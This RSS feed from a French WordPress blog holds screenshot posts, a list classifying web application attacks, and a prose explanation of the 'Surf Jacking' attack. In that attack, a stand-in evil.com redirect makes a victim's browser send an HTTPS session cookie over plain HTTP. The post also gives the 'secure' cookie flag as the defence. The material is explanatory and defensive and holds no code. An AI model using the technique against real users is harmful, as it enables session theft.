<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>E-ECK.ORG</title>
	<atom:link href="http://electronicedencreationkit.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://electronicedencreationkit.wordpress.com</link>
	<description>Electronic Eden Creation Kit</description>
	<lastBuildDate>Sun, 20 Dec 2009 09:45:47 +0000</lastBuildDate>
	<language>fr</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='electronicedencreationkit.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>E-ECK.ORG</title>
		<link>http://electronicedencreationkit.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://electronicedencreationkit.wordpress.com/osd.xml" title="E-ECK.ORG" />
	<atom:link rel='hub' href='http://electronicedencreationkit.wordpress.com/?pushpress=hub'/>
		<item>
		<title>MeteoFrance.fr sous la neige..</title>
		<link>http://electronicedencreationkit.wordpress.com/2009/12/20/meteofrance-fr-sous-la-neige/</link>
		<comments>http://electronicedencreationkit.wordpress.com/2009/12/20/meteofrance-fr-sous-la-neige/#comments</comments>
		<pubDate>Sun, 20 Dec 2009 09:44:37 +0000</pubDate>
		<dc:creator>gsurang</dc:creator>
				<category><![CDATA[Screenshots]]></category>

		<guid isPermaLink="false">http://electronicedencreationkit.wordpress.com/?p=97</guid>
		<description><![CDATA[<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=electronicedencreationkit.wordpress.com&amp;blog=4386396&amp;post=97&amp;subd=electronicedencreationkit&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:center;"><a href="http://electronicedencreationkit.files.wordpress.com/2009/12/meteofrance.png"><img class="aligncenter size-medium wp-image-98" title="meteofrance" src="http://electronicedencreationkit.files.wordpress.com/2009/12/meteofrance.png?w=406&#038;h=158" alt="" width="406" height="158" /></a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/electronicedencreationkit.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/electronicedencreationkit.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/electronicedencreationkit.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/electronicedencreationkit.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/electronicedencreationkit.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/electronicedencreationkit.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/electronicedencreationkit.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/electronicedencreationkit.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/electronicedencreationkit.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/electronicedencreationkit.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/electronicedencreationkit.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/electronicedencreationkit.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/electronicedencreationkit.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/electronicedencreationkit.wordpress.com/97/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=electronicedencreationkit.wordpress.com&amp;blog=4386396&amp;post=97&amp;subd=electronicedencreationkit&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://electronicedencreationkit.wordpress.com/2009/12/20/meteofrance-fr-sous-la-neige/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/70cbc8a270220b408d17ecca9e1747c3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">gsurang</media:title>
		</media:content>

		<media:content url="http://electronicedencreationkit.files.wordpress.com/2009/12/meteofrance.png?w=300" medium="image">
			<media:title type="html">meteofrance</media:title>
		</media:content>
	</item>
		<item>
		<title>caisse-epargne.. pressée de prélever ??</title>
		<link>http://electronicedencreationkit.wordpress.com/2009/02/24/caisse-epargne-pressee-de-prelever/</link>
		<comments>http://electronicedencreationkit.wordpress.com/2009/02/24/caisse-epargne-pressee-de-prelever/#comments</comments>
		<pubDate>Tue, 24 Feb 2009 19:55:30 +0000</pubDate>
		<dc:creator>gsurang</dc:creator>
				<category><![CDATA[Screenshots]]></category>

		<guid isPermaLink="false">http://electronicedencreationkit.wordpress.com/?p=68</guid>
		<description><![CDATA[<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=electronicedencreationkit.wordpress.com&amp;blog=4386396&amp;post=68&amp;subd=electronicedencreationkit&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:center;"><a href="http://electronicedencreationkit.files.wordpress.com/2009/02/caisse-epargne.jpg"><img class="size-medium wp-image-69 aligncenter" title="caisse-epargne" src="http://electronicedencreationkit.files.wordpress.com/2009/02/caisse-epargne.jpg?w=300&#038;h=197" alt="caisse-epargne" width="300" height="197" /></a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/electronicedencreationkit.wordpress.com/68/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/electronicedencreationkit.wordpress.com/68/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/electronicedencreationkit.wordpress.com/68/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/electronicedencreationkit.wordpress.com/68/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/electronicedencreationkit.wordpress.com/68/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/electronicedencreationkit.wordpress.com/68/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/electronicedencreationkit.wordpress.com/68/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/electronicedencreationkit.wordpress.com/68/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/electronicedencreationkit.wordpress.com/68/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/electronicedencreationkit.wordpress.com/68/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/electronicedencreationkit.wordpress.com/68/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/electronicedencreationkit.wordpress.com/68/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/electronicedencreationkit.wordpress.com/68/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/electronicedencreationkit.wordpress.com/68/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=electronicedencreationkit.wordpress.com&amp;blog=4386396&amp;post=68&amp;subd=electronicedencreationkit&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://electronicedencreationkit.wordpress.com/2009/02/24/caisse-epargne-pressee-de-prelever/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/70cbc8a270220b408d17ecca9e1747c3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">gsurang</media:title>
		</media:content>

		<media:content url="http://electronicedencreationkit.files.wordpress.com/2009/02/caisse-epargne.jpg?w=300" medium="image">
			<media:title type="html">caisse-epargne</media:title>
		</media:content>
	</item>
		<item>
		<title>Shopping MP3&#8230;</title>
		<link>http://electronicedencreationkit.wordpress.com/2008/09/09/shopping-mp3/</link>
		<comments>http://electronicedencreationkit.wordpress.com/2008/09/09/shopping-mp3/#comments</comments>
		<pubDate>Tue, 09 Sep 2008 09:27:41 +0000</pubDate>
		<dc:creator>gsurang</dc:creator>
				<category><![CDATA[Screenshots]]></category>

		<guid isPermaLink="false">http://electronicedencreationkit.wordpress.com/?p=43</guid>
		<description><![CDATA[Trouvez l&#8217;erreur&#8230;<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=electronicedencreationkit.wordpress.com&amp;blog=4386396&amp;post=43&amp;subd=electronicedencreationkit&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Trouvez l&#8217;erreur&#8230;</p>
<p style="text-align:center;"><a href="http://electronicedencreationkit.files.wordpress.com/2008/09/trouvez-lerreur.png"><img class="size-medium wp-image-44 aligncenter" title="trouvez-lerreur" src="http://electronicedencreationkit.files.wordpress.com/2008/09/trouvez-lerreur.png?w=258&#038;h=300" alt="" width="258" height="300" /></a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/electronicedencreationkit.wordpress.com/43/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/electronicedencreationkit.wordpress.com/43/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/electronicedencreationkit.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/electronicedencreationkit.wordpress.com/43/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/electronicedencreationkit.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/electronicedencreationkit.wordpress.com/43/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/electronicedencreationkit.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/electronicedencreationkit.wordpress.com/43/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/electronicedencreationkit.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/electronicedencreationkit.wordpress.com/43/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/electronicedencreationkit.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/electronicedencreationkit.wordpress.com/43/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/electronicedencreationkit.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/electronicedencreationkit.wordpress.com/43/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/electronicedencreationkit.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/electronicedencreationkit.wordpress.com/43/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=electronicedencreationkit.wordpress.com&amp;blog=4386396&amp;post=43&amp;subd=electronicedencreationkit&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://electronicedencreationkit.wordpress.com/2008/09/09/shopping-mp3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/70cbc8a270220b408d17ecca9e1747c3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">gsurang</media:title>
		</media:content>

		<media:content url="http://electronicedencreationkit.files.wordpress.com/2008/09/trouvez-lerreur.png?w=258" medium="image">
			<media:title type="html">trouvez-lerreur</media:title>
		</media:content>
	</item>
		<item>
		<title>Applis Web &#8211; Classification des menaces</title>
		<link>http://electronicedencreationkit.wordpress.com/2008/09/09/applis-web-classification-des-menaces/</link>
		<comments>http://electronicedencreationkit.wordpress.com/2008/09/09/applis-web-classification-des-menaces/#comments</comments>
		<pubDate>Tue, 09 Sep 2008 09:17:05 +0000</pubDate>
		<dc:creator>gsurang</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://electronicedencreationkit.wordpress.com/?p=34</guid>
		<description><![CDATA[Classification des menaces concernants les applications Webs par classe d&#8217;attaques: Authentification Concerne les attaques qui ciblent le mécanisme d&#8217;authentification / validation d&#8217;identité &#171;&#160;Brute Force&#171;&#160; L&#8217;attaque par force brute est une méthode utilisée pour trouver un mot de passe. Il s&#8217;agit de tester, une à une, toutes les combinaisons possibles. Celle-ci peut également être faite par [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=electronicedencreationkit.wordpress.com&amp;blog=4386396&amp;post=34&amp;subd=electronicedencreationkit&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Classification des menaces concernants les applications Webs par classe d&#8217;attaques:</p>
<ul>
<li><strong>Authentification<br />
</strong><em>Concerne les attaques qui ciblent le mécanisme d&#8217;authentification / validation d&#8217;identité<br />
</em></p>
<ul>
<li>&laquo;&nbsp;<strong>Brute Force</strong>&laquo;&nbsp;<br />
L&#8217;attaque par force brute est une méthode utilisée pour trouver un mot de passe. Il s&#8217;agit de tester, une à une, toutes les combinaisons possibles. Celle-ci peut également être faite par dictionnaire, l&#8217;attaquant fournissant alors une liste de mot que le programme réalisant l&#8217;attaque pourra alors essayer un à un ou en créant des combinaisons.</li>
</ul>
<ul>
<li>&laquo;&nbsp;<strong>Insufficient Authentication</strong>&laquo;&nbsp;<br />
L&#8217;insuffisance d&#8217;authentification apparait lorsqu&#8217;il est possible d&#8217;accéder à un contenu restreint sans avoir eu besoin de fournir une authentification.<br />
Par exemple: un site fournit un accès à un contenu X. Lors de l&#8217;accès au site un formulaire demande à l&#8217;utilisateur de s&#8217;authentifier, mais la connaissance du chemin complet au contenu X permet d&#8217;y accéder sans qu&#8217;aucun problème d&#8217;identification n&#8217;apparaisse.</li>
</ul>
<ul>
<li>&laquo;&nbsp;<strong>Weak password recovery validation</strong>&laquo;&nbsp;<br />
Cette attaque est basé sur la possibilité à un utilisateur qui a perdu son mot de passe de le récuperer d&#8217;une manière triviale, avec par exemple la simple demande de la date de naissance de l&#8217;utilisateur.</li>
</ul>
</li>
</ul>
<ul>
<li><strong>Autorisations<br />
</strong><em>Concerne les attaques qui ont pour but d&#8217;élever les privilèges d&#8217;un utilisateur<br />
</em></p>
<ul>
<li>&laquo;&nbsp;<strong>Credential/Session prediction</strong>&laquo;&nbsp;<br />
Cette attaque vise à outrepasser l&#8217;authentification en prédisant l&#8217;identifiant de session.  En analysant le processus de génération d&#8217;identifiant de session, l&#8217;attaquant pourra être en mesure de forger un identifiant de session valide et ainsi obtenir un accès à l&#8217;application.</li>
<li>&laquo;&nbsp;<strong>Insufficient authorization</strong>&laquo;&nbsp;</li>
<li>&laquo;&nbsp;<strong>Insufficient session expiration</strong>&laquo;&nbsp;</li>
<li>&laquo;&nbsp;<strong>Session fixation</strong>&laquo;&nbsp;</li>
</ul>
</li>
<li><strong>Attaques coté client</strong>
<ul>
<li>&laquo;&nbsp;<strong>Content spoofing</strong>&laquo;&nbsp;</li>
<li>&laquo;&nbsp;<strong>Cross-site scripting</strong>&laquo;&nbsp;</li>
</ul>
</li>
<li><strong>Exécution de commandes</strong>
<ul>
<li>&laquo;&nbsp;<strong>Buffer overflow</strong>&laquo;&nbsp;</li>
<li>&laquo;&nbsp;<strong>Format String Attack</strong>&laquo;&nbsp;</li>
<li>&laquo;&nbsp;<strong>Ldap Injection</strong>&laquo;&nbsp;</li>
<li>&laquo;&nbsp;<strong>OS Commanding</strong>&laquo;&nbsp;</li>
<li>&laquo;&nbsp;<strong>SQL Injection</strong>&laquo;&nbsp;</li>
<li>&laquo;&nbsp;<strong>SSI Injection</strong>&laquo;&nbsp;</li>
<li>&laquo;&nbsp;<strong>XPath Injection</strong>&laquo;&nbsp;</li>
</ul>
</li>
<li><strong>Fuite d&#8217;informations</strong>
<ul>
<li>&laquo;&nbsp;<strong>Directory Indexing</strong>&laquo;&nbsp;</li>
<li>&laquo;&nbsp;<strong>Information Leakage</strong>&laquo;&nbsp;</li>
<li>&laquo;&nbsp;<strong>Path Traversal</strong>&laquo;&nbsp;</li>
<li>&laquo;&nbsp;<strong>Predictable Ressource Location</strong>&laquo;&nbsp;</li>
</ul>
</li>
<li><strong>Attaques logiques</strong>
<ul>
<li>&laquo;&nbsp;<strong>Abuse of functionnality</strong>&laquo;&nbsp;</li>
<li>&laquo;&nbsp;<strong>Denial of Service</strong>&laquo;&nbsp;</li>
<li>&laquo;&nbsp;<strong>Insufficient Anti-Automation</strong>&laquo;&nbsp;</li>
<li>&laquo;&nbsp;<strong>Insufficient Process Validation</strong>&laquo;&nbsp;</li>
</ul>
</li>
</ul>
<p>Sources:</p>
<ul>
<li><a href="http://www.webappsec.org/projects/threat/classes_of_attack.shtml" target="_blank">http://www.webappsec.org/projects/threat/classes_of_attack.shtml</a></li>
</ul>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/electronicedencreationkit.wordpress.com/34/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/electronicedencreationkit.wordpress.com/34/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/electronicedencreationkit.wordpress.com/34/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/electronicedencreationkit.wordpress.com/34/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/electronicedencreationkit.wordpress.com/34/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/electronicedencreationkit.wordpress.com/34/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/electronicedencreationkit.wordpress.com/34/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/electronicedencreationkit.wordpress.com/34/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/electronicedencreationkit.wordpress.com/34/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/electronicedencreationkit.wordpress.com/34/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/electronicedencreationkit.wordpress.com/34/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/electronicedencreationkit.wordpress.com/34/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/electronicedencreationkit.wordpress.com/34/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/electronicedencreationkit.wordpress.com/34/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/electronicedencreationkit.wordpress.com/34/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/electronicedencreationkit.wordpress.com/34/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=electronicedencreationkit.wordpress.com&amp;blog=4386396&amp;post=34&amp;subd=electronicedencreationkit&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://electronicedencreationkit.wordpress.com/2008/09/09/applis-web-classification-des-menaces/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/70cbc8a270220b408d17ecca9e1747c3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">gsurang</media:title>
		</media:content>
	</item>
		<item>
		<title>L&#8217;attaque Surf Jacking</title>
		<link>http://electronicedencreationkit.wordpress.com/2008/08/15/lattaque-surf-jacking/</link>
		<comments>http://electronicedencreationkit.wordpress.com/2008/08/15/lattaque-surf-jacking/#comments</comments>
		<pubDate>Fri, 15 Aug 2008 09:49:13 +0000</pubDate>
		<dc:creator>gsurang</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://electronicedencreationkit.wordpress.com/?p=25</guid>
		<description><![CDATA[L&#8217;attaque de Surf Jacking permet de voler un cookie qui transite via une communication sécurisée (HTTPS). Requis: pouvoir capturer le traffic envoyé en clair par la cible (wifi&#8230;) Le principe: - la cible se connecte à un service web sécurisé https://www.mabanque.com - alors que la cible est logguée, elle se connecte à http://www.evil.com - evil.com [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=electronicedencreationkit.wordpress.com&amp;blog=4386396&amp;post=25&amp;subd=electronicedencreationkit&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>L&#8217;attaque de Surf Jacking permet de voler un cookie qui transite via une communication sécurisée (HTTPS).</p>
<p>Requis: pouvoir capturer le traffic envoyé en clair par la cible (wifi&#8230;)</p>
<p>Le principe:</p>
<p>- la cible se connecte à un service web sécurisé https://www.mabanque.com<br />
- alors que la cible est logguée, elle se connecte à http://www.evil.com<br />
- evil.com renvoi un 301&#8243;Move permanently&nbsp;&raquo;, redirigeant le naviguateur de la cible vers http://www.mabanque.com<br />
- la cible ouvre une connection en clair vers mabanque.com, envoyant le cookie..</p>
<p>Pour prévenir qu&#8217;un cookie délivré par HTTPS soit renvoyé dans une session non chiffré:</p>
<p>Le cookie doit être marqué comme &#8216;secure&#8217; (RFC2109).</p>
<p>Example:</p>
<p><span style="font-size:x-small;font-family:Verdana,Arial,Helvetica;"> Set-Cookie:Session:1234567890;Path=/;secure</span></p>
<p><span style="font-size:x-small;font-family:Verdana,Arial,Helvetica;"> </span></p>
<p>Un plugin Firefox pour détecter les sites vulnérables à cette attaque: https://addons.mozilla.org/fr/firefox/addon/8454<br />
Source:<br />
<a href="http://enablesecurity.com/2008/08/11/surf-jack-https-will-not-save-you/"> http://enablesecurity.com/2008/08/11/surf-jack-https-will-not-save-you/</a><br />
<a href="http://resources.enablesecurity.com/resources/Surf%20Jacking.pdf"> http://resources.enablesecurity.com/resources/Surf%20Jacking.pdf</a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/electronicedencreationkit.wordpress.com/25/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/electronicedencreationkit.wordpress.com/25/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/electronicedencreationkit.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/electronicedencreationkit.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/electronicedencreationkit.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/electronicedencreationkit.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/electronicedencreationkit.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/electronicedencreationkit.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/electronicedencreationkit.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/electronicedencreationkit.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/electronicedencreationkit.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/electronicedencreationkit.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/electronicedencreationkit.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/electronicedencreationkit.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/electronicedencreationkit.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/electronicedencreationkit.wordpress.com/25/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=electronicedencreationkit.wordpress.com&amp;blog=4386396&amp;post=25&amp;subd=electronicedencreationkit&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://electronicedencreationkit.wordpress.com/2008/08/15/lattaque-surf-jacking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/70cbc8a270220b408d17ecca9e1747c3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">gsurang</media:title>
		</media:content>
	</item>
		<item>
		<title>alten-ie-bug</title>
		<link>http://electronicedencreationkit.wordpress.com/2008/08/10/alten-ie-bug/</link>
		<comments>http://electronicedencreationkit.wordpress.com/2008/08/10/alten-ie-bug/#comments</comments>
		<pubDate>Sun, 10 Aug 2008 10:19:44 +0000</pubDate>
		<dc:creator>gsurang</dc:creator>
				<category><![CDATA[Screenshots]]></category>

		<guid isPermaLink="false">http://electronicedencreationkit.wordpress.com/?p=22</guid>
		<description><![CDATA[<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=electronicedencreationkit.wordpress.com&amp;blog=4386396&amp;post=22&amp;subd=electronicedencreationkit&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://electronicedencreationkit.files.wordpress.com/2008/08/alten-ie.png"><img class="aligncenter size-medium wp-image-23" src="http://electronicedencreationkit.files.wordpress.com/2008/08/alten-ie.png?w=300&#038;h=199" alt="" width="300" height="199" /></a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/electronicedencreationkit.wordpress.com/22/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/electronicedencreationkit.wordpress.com/22/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/electronicedencreationkit.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/electronicedencreationkit.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/electronicedencreationkit.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/electronicedencreationkit.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/electronicedencreationkit.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/electronicedencreationkit.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/electronicedencreationkit.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/electronicedencreationkit.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/electronicedencreationkit.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/electronicedencreationkit.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/electronicedencreationkit.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/electronicedencreationkit.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/electronicedencreationkit.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/electronicedencreationkit.wordpress.com/22/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=electronicedencreationkit.wordpress.com&amp;blog=4386396&amp;post=22&amp;subd=electronicedencreationkit&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://electronicedencreationkit.wordpress.com/2008/08/10/alten-ie-bug/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/70cbc8a270220b408d17ecca9e1747c3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">gsurang</media:title>
		</media:content>

		<media:content url="http://electronicedencreationkit.files.wordpress.com/2008/08/alten-ie.png?w=300" medium="image" />
	</item>
		<item>
		<title>Google 403 Forbidden</title>
		<link>http://electronicedencreationkit.wordpress.com/2008/08/01/google-403-forbidden/</link>
		<comments>http://electronicedencreationkit.wordpress.com/2008/08/01/google-403-forbidden/#comments</comments>
		<pubDate>Fri, 01 Aug 2008 17:34:44 +0000</pubDate>
		<dc:creator>gsurang</dc:creator>
				<category><![CDATA[Screenshots]]></category>

		<guid isPermaLink="false">http://electronicedencreationkit.wordpress.com/?p=14</guid>
		<description><![CDATA[Voilà ce qui arrive quand on fait des recherches classées &#171;&#160;bizarroïde&#160;&#187; :p<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=electronicedencreationkit.wordpress.com&amp;blog=4386396&amp;post=14&amp;subd=electronicedencreationkit&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<div class="mceTemp mceIEcenter" style="text-align:left;">Voilà ce qui arrive quand on fait des recherches classées &laquo;&nbsp;bizarroïde&nbsp;&raquo; :p</div>
<div id="attachment_15" class="wp-caption aligncenter" style="width: 310px"><a href="http://electronicedencreationkit.files.wordpress.com/2008/08/403google.jpg"><img class="size-medium wp-image-15" src="http://electronicedencreationkit.files.wordpress.com/2008/08/403google.jpg?w=300&#038;h=108" alt="google_403_forbidden" width="300" height="108" /></a><p class="wp-caption-text">google_403_forbidden</p></div>
